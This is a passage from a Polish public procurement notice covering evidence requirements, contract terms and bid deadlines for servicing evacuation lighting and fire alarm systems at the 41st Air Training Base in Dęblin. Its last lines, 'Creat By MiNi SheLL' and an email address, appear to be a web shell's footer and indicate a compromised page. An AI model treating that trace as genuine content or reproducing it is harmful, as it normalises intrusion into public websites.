ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">II. Etap B – podmiotowe środki dowodowe (dokumenty składane na żądanie Zamawiającego)1.	W zakresie potwierdzenia BRAKU PODSTAW DO WYKLUCZENIA Wykonawcy z postępowania Zamawiający zażąda przedstawienia: <br/>1.1. oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp – (według wzoru – Załącznika Nr 6 do SWZ); <br/>1.2. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp. <br/>Zamawiający, zgodnie z art. 274 ust 4 ustawy Pzp nie wezwie dokumentów wskazanych w pkt 1.2., jeżeli Zamawiający możne je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskaże w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków (tj. w oświadczeniu składanym wraz z ofertą stanowiącym Załącznik Nr 2 do SWZ).<br/>1.3. oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postepowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka zapobiegawczego,<br/>c)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	art. 109 ust. 1 pkt 1 ustawy Pzp, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170);<br/>f)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 poz. 835)<br/>(według wzoru - Załącznik Nr 7a/7b SWZ)<br/>W sytuacji wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) - dokumenty wymienione w pkt II.1.1, II.1.2., II.1.3. składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (partner konsorcjum/wspólnik).<br/>W przypadku innego podmiotu, na którego zdolnościach Wykonawca polega, dokumenty wymienione w pkt II.1.1, II.1.2., II 1.3. Wykonawca składa w odniesieniu do każdego z podmiotów.<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. II.1.2. składa dokument lub dokumenty wystawione w kraju,w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">II. Etap B – podmiotowe środki dowodowe (dokumenty składane na żądanie Zamawiającego)<br/>2.	W zakresie potwierdzenia SPEŁNIANIA PRZEZ WYKONAWCĘ WARUNKÓW UDZIAŁU W POSTEPOWANIU:<br/><br/>2.1.	dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika to z odrębnych przepisów Zamawiający zażąda przedstawienia: <br/><br/>- w zakresie ZADANIA II:<br/>a/ aktualnego zezwolenia wydanego przez Państwową Agencję Atomistyki w zakresie obsługi urządzeń zawierających źródła promieniotwórcze.<br/><br/>2.2.	dotyczących zdolności technicznej lub zawodowej Zamawiający zażąda:<br/><br/>2.3.	w zakresie ZADANIA I: <br/><br/>a/ wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami – zgodnie z wzorem stanowiącym załącznik nr 8a do SWZ)<br/>W wykazie osób o którym mowa wyżej wykonawca winien wykazać osoby, którymi będzie dysponował na etapie realizacji zamówienia, spełniające następujące wymagania tj., że:<br/>•	Dysponuje dwoma pracownikami technicznymi (minimum 2 osoby), będącymi osobami realizującymi przedmiotowe zamówienie, posiadającymi uprawnienia:<br/>- ważne Świadectwo kwalifikacyjne Urzędu Regulacji Energetyki kategorii „D” i „E” w grupie 1 zgodnie z art. 54 Ustawy z dnia 10 kwietnia 1997r. – Prawo Energetyczne <br/><br/>UWAGA <br/>W przypadku składania oferty na więcej niż jedno zadanie Wykonawcy zobowiązani są udokumentować dysponowanie osobami oddzielnie dla każdego zadania, na które składana jest oferta.<br/><br/>2.4.	w zakresie ZADANIA II: <br/><br/>a/ wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami – zgodnie z wzorem stanowiącym załącznik nr 8b do SWZ)<br/>W wykazie osób o którym mowa wyżej wykonawca winien wykazać osoby, którymi będzie dysponował na etapie realizacji zamówienia, spełniające następujące wymagania tj., że:<br/>•	Dysponuje dwoma pracownikami technicznymi (minimum 2 osoby), będącymi osobami realizującymi przedmiotowe zamówienie, posiadającymi uprawnienia:<br/>- ważne Świadectwo kwalifikacyjne Urzędu Regulacji Energetyki kategorii „D” i „E” w grupie 1 zgodnie z art. 54 Ustawy z dnia 10 kwietnia 1997r. – Prawo Energetyczne <br/><br/>UWAGA <br/>W przypadku składania oferty na więcej niż jedno zadanie Wykonawcy zobowiązani są udokumentować dysponowanie osobami oddzielnie dla każdego zadania, na które składana jest oferta.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy wszystkich zadań:<br/>Dokumenty na potwierdzenie równoważności (jeżeli dotyczy):<br/>Stosownie do art. 101 ust. 5 ustawy Pzp Wykonawca powołujący się na zastosowanie rozwiązań równoważnych winien wykazać, iż spełniają one wymogi Zamawiającego w szczególności za pomocą przedmiotowych środków dowodowych, poprzez udokumentowanie załączonymi do oferty w szczególności: informacjami na temat parametrów techniczno-wytrzymałościowych, szczegółowymi rysunkami technicznymi, atestami, aprobatami, deklaracjami zgodności, kartami katalogowymi urządzeń i materiałów zamiennych. Niniejsze dokumenty muszą w sposób jednoznaczny stwierdzać równoważność proponowanych materiałów, urządzeń i rozwiązań w stosunku do przyjętych w dokumentacji Zamawiającego.<br/>Brak w ofercie oświadczenia o oferowaniu materiałów, urządzeń o rozwiązaniach równoważnych oraz dokumentów potwierdzających równoważność rozwiązań stanowić będzie domniemanie zaoferowania rozwiązań wskazanych przez Zamawiającego w dokumentach zamówienia.<br/>Jeżeli Wykonawca złoży oświadczenie, że oferuje materiały, urządzenia o rozwiązaniach równoważnych, a nie złoży przedmiotowych środków dowodowych określonych wyżej lub złożone przedmiotowe środki dowodowe są niekompletne, nie potwierdzają, zgodności produktu z cechami określonymi w opisie przedmiotu zamówienia – we wskazanych tam normach) - Zamawiający wezwie Wykonawcę do ich złożenia lub uzupełnienia w wyznaczonym terminie (zgodnie z art. 107 ust. 2 ustawy Pzp).<br/>Na podstawie art. 106 ust. 3 ustawy Pzp - Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzą, że oferowane usługi spełniają określone przez zamawiającego wymagania, cechy lub kryteria. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Stosownie do art. 101 ust. 5 ustawy Pzp Wykonawca powołujący się na zastosowanie rozwiązań równoważnych winien wykazać, iż spełniają one wymogi Zamawiającego w szczególności za pomocą przedmiotowych środków dowodowych, poprzez udokumentowanie załączonymi do oferty w szczególności: informacjami na temat parametrów techniczno-wytrzymałościowych, szczegółowymi rysunkami technicznymi, atestami, aprobatami, deklaracjami zgodności, kartami katalogowymi urządzeń i materiałów zamiennych. Niniejsze dokumenty muszą w sposób jednoznaczny stwierdzać równoważność proponowanych materiałów, urządzeń i rozwiązań w stosunku do przyjętych w dokumentacji Zamawiającego. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> I. Etap A – dokumenty składane wraz z ofertą Wykonawcy zobowiązani są dołączyć do oferty (Formularz ofertowy) –<br/>Załącznik Nr 1 do SWZ:<br/>1. oświadczenie o niepodleganiu wykluczeniu (na podstawie art. 125 ust. 1 ustawy Pzp) aktualne na dzień składania ofert<br/>(wg wzoru - Załącznik Nr 2 do SWZ), stanowiące wstępne<br/>potwierdzenie, że Wykonawca nie podlega wykluczeniu z postepowania.składania ofert (wg wzoru - Załącznik Nr 3 do SWZ),<br/>stanowiące wstępne potwierdzenie, że Wykonawca spełnia warunki udziału w postępowaniu.<br/>3. pełnomocnictwo, w sytuacji, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych<br/>wykonawcy.<br/>WSPÓLNE UBIEGANIE SIĘ O UDZIELENIE ZAMÓWIENIA W przypadku wspólnego ubiegania się o udzielenie<br/>zamówienia przez Wykonawców:<br/>a) oświadczenie, o których mowa w pkt I.1 składa każdy z Wykonawców. Oświadczenia te stanowią wstępne<br/>potwierdzenie braku podstaw wykluczenia (art. 125 ust. 4 ustawy Pzp);<br/>b) oświadczenie, o których mowa w pkt I.2, składa każdy z Wykonawców. Oświadczenia te stanowią wstępne potwierdzenie<br/>spełnienia warunków udziału (art. 125 ust. 4 ustawy Pzp);<br/>c) pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowaniaubiegających się o udzielenie zamówienia, ewentualnie<br/>umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo.<br/>d) oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp - oświadczenie wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, z którego wynikać będzie, które<br/>usługi wykonają poszczególni wykonawcy (wg wzoru - Załącznik Nr 4 do SWZ),<br/>POLEGANIE NA ZDOLNOŚCIACH LUB SYTUACJI PODMIOTÓW UDOSTĘPNIAJĄCYCH ZASOBY W przypadku gdy<br/>Wykonawca, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem<br/>własnym, o którym mowa w pkt I. 1 i 2 także:<br/>a) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji przedmiotowego zamówienia (wg wzoru<br/>stanowiącego Załącznik Nr 5 do SWZ) lub inny środek dowody potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>b) oświadczenie podmiotu udostepniającego zasoby o niepodleganiu wykluczeniu zgodnie z art. 125 ust. 1 ustawy Pzp<br/>aktualne na dzień składania ofert (wg wzoru - Załącznik Nr 2a do SWZ), stanowiące wstępne potwierdzenie, że podmiot<br/>udostepniający zasoby Wykonawca nie podlega wykluczeniu z postępowania (oświadczenie musi być podpisane przez<br/>podmiot<br/>udostepniający zasoby bądź osoby do tego upoważnione)<br/>c) oświadczenie podmiotu udostepniającego zasoby o spełnieniu warunków udziału w postępowaniu zgodnie z art. 125 ust.<br/>1 ustawy Pzp aktualne na dzień składania ofert (wg wzoru - Załącznik Nr 3a do SWZ), stanowiące wstępne potwierdzenie,<br/>że podmiot udostepniający zasoby na którego powołuje się Wykonawca spełnia warunki udziału w postępowaniu<br/>(oświadczenie musi być podpisane przez podmiot udostepniający zasoby bądź osoby do tego upoważnione).<br/>4. uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa (jeśli dotyczy)<br/>5) dowody - samooczyszczenie –- patrz Rozdział 6 SWZ (jeśli dotyczy);<br/>6) przedmiotowe środki dowodowe – patrz Rozdział 8A (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Dotyczy wszystkich zadań:<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną. <br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale 6 SWZ. <br/><br/>3. Wykonawcy ustanawiają PEŁNOMOCNIKA do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku Wykonawca musi złożyć wraz z ofertą stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu o udzieleniu zamówienia publicznego na zasadach określonych w SWZ. <br/><br/>4. Dokumenty składane przez członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu. <br/><br/>5. W toku postępowania wszelka korespondencja ze strony Zamawiającego będzie kierowana do pełnomocnika danego podmiotu ubiegającego się wspólnie o zamówienie. <br/><br/>6. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1 i 4 ustawy Pzp; oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 poz. 835).<br/><br/>7. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia publicznego zobowiązani są złożyć wraz z ofertą oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy – art. 117 ust. 4 ustawy PZP – (wzór oświadczenia stanowi załącznik nr 4 do SWZ.) <br/><br/>8. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego dokumenty wymienione w Rozdziale 8 - zobowiązani są złożyć oddzielnie dla każdej z firm (w odpowiedzi na wezwanie Zamawiającego). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dotyczy wszystkich zadań<br/>Projektowane postanowienia umow załącznik 9a/9b do SWZ <br/>1.	Zmiany umowy wymagają zgodnej woli stron oraz zachowania formy pisemnej w postaci aneksu, pod rygorem nieważności w poniższym zakresie: <br/>1)	Zamawiający dopuszcza możliwość zmiany osób odpowiedzialnych za realizację umowy, jeżeli zajdzie taka potrzeba – w przypadku rozwiązania lub wygaśnięcia stosunku pracy z daną osobą lub zdarzenia losowego, choroby uniemożliwiającej pełnienie powierzonych jej obowiązków; <br/>2)	gdy ze względu na zmianę przepisów prawa (uchylenia, zmiany lub nowelizacji przepisów) lub z innych przyczyn o charakterze obiektywnym nie będzie możliwe spełnienie przez Wykonawcę wymogów lub konieczne będzie spełnienie wymogów dodatkowych; <br/>3)	wartość umowy może ulec zmianie w przypadku ustawowej zmiany stawki podatku VAT, w zakresie wynikającym z tej zmiany; <br/>4)	zmiany Zamawiającego w przypadku zmian organizacyjnych polegających na reorganizacji, z której będzie wynikało, iż obowiązki Zamawiającego przejmie inna jednostka organizacyjna resortu Obrony Narodowej na zasadach określonych w Kodeksie Cywilnym ( cesja praw i obowiązków) <br/>2. Zgodnie z art. 455 ust. 2 ustawy Prawo zamówień publicznych dopuszczalne są zmiany umowy bez przeprowadzenia nowego postępowania o udziale zamówienia, których łączna wartość jest mniejsza niż progi unijne oraz jest niższa niż 10 % wartości pierwotnej umowy, w przypadku zamówienia na usługi lub dostawy, a zmiany te nie powodują zmiany ogólnego charakteru umowy – na tej podstawie całkowita wartość umowy, może ulec zwiększeniu o nie więcej niż 10 % wartości określonej w umowie, w § 4, ust.1 umowy na skutek nieznacznego zwiększenia zakresu zamówienia. Zamawiający dokonywać będzie weryfikacji zaproponowanych cen jednostkowych w celu stwierdzenia czy nie przekraczają one aktualnych cen rynkowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-21 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi w niniejszej SWZ dokumentami i oświadczeniami (załącznikami) należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/transakcja/1136619</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-21 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> ZADANIE I<br/><br/> Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w trakcie realizacji umowy, których wykonywanie polega na wykonywaniu pracy w sposób określony w art. 22 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku Pracy osób wykonujących czynności bezpośrednio związane: z przeglądami, konserwacją i naprawami systemu oświetlenia ewakuacyjnego tj:<br/><br/> wszelkich czynności - polegających na wykonywaniu usługi w zakresie wykonania przeglądów technicznych i czynności konserwacyjnych oraz napraw instalacji systemu oświetlenia ewakuacyjnego znajdujących się w budynkach administrowanych przez 41 Bazę Lotnictwa Szkolnego w Dęblinie. <br/><br/> ZADANIE II<br/><br/> Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących czynności w trakcie realizacji umowy, których wykonywanie polega na wykonywaniu pracy w sposób określony w art. 22 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku Pracy osób wykonujących czynności bezpośrednio związane z przeglądami i konserwacją Systemów Sygnalizacji Pożaru, instalacji systemu oświetlenia ewakuacyjnego tj.: <br/> - wszelkich czynności polegających na wykonywaniu usługi w zakresie wykonania przeglądów technicznych i czynności konserwacyjnych instalacji systemu sygnalizacji pożaru, instalacji systemu oświetlenia ewakuacyjnego znajdujących się w budynkach administrowanych przez 41 Bazę Lotnictwa Szkolnego w Dęblinie. <br/> Ponadto o udzielenie przedmiotowego zamówienia mogą ubiegać się wykonawcy którzy wykażą brak podstaw wykluczenia na podstawie <br/>- art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2022 poz. 835). Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>7. Zwrot kosztów udziału w postępowaniu<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>8. Zaliczki na poczet udzielenia zamówienia<br/>Zamawiający nie przewiduje udzielania zaliczek na poczet realizacji zamówienia przez Wykonawcę;<br/>Dotyczy Zadania I : Zmawiający przewiduje zabezpieczenie należytego wykonania umowy.<br/>Dotyczy ZADANIA II: 1. Zmawiający nie przewiduje zabezpieczenia należytego wykonania umowy Zadanie II.

Creat By MiNi SheLL
Email: jattceo@gmail.com